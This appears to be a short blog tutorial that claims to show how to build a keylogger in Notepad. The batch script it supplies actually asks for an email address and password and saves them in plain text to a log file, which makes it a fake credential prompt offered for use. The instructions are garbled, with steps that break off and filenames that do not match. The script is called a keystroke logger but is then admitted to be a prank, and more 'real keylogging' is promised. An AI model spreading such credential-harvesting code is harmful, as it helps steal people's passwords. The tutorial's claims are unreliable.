For new readers, I will explain the meaning of Keylogger below.
Keylogger is a method, which records every keystroke on the computer . It records all the activity doing on the computer. In this tutorial, I will tell you about the Notepad Keylogger, By using of this keylogger you don’t require any additional software.
- Follow the below given instructions to create a keylogger.
Create Keylogger in Notepad & Record Computer keystrokes
- You don’t require any professional skills to create this Keylogger. Just open the notepad and follow the steps.
- Creating Keylogger With Notepad
Just open the notepad from the start menu. Copy and paste the below given code into the notepad.
echo Please Enter Your Email Address And Password
set /p user=Username:
set /p pass=Password:
echo Username=”%user%” Password=”%pass%” >> Log.txt
start >>Program Here<<
- Save this file on the desktop as a
Now create the folder named the
- Record computer keystrokes
activity and paste it into c drive. Note that keylogger will not work if you named the folder something else.
- Now test your logs.bat file by entering the username and password.
To check logs open the folder activity and there you will find the text file named logs.txt.
so that’s how you can create keylogger with notepad. Actually, this is a prank file. You can only record the strokes, which are entered in a batch file. To record all the activity like browsing and account information you must stay touch with us.
In my next article, I will tell you about
keylogger hacking method. In that tutorial, you will learn about real keylogging. So like us or subscribe our newsletter.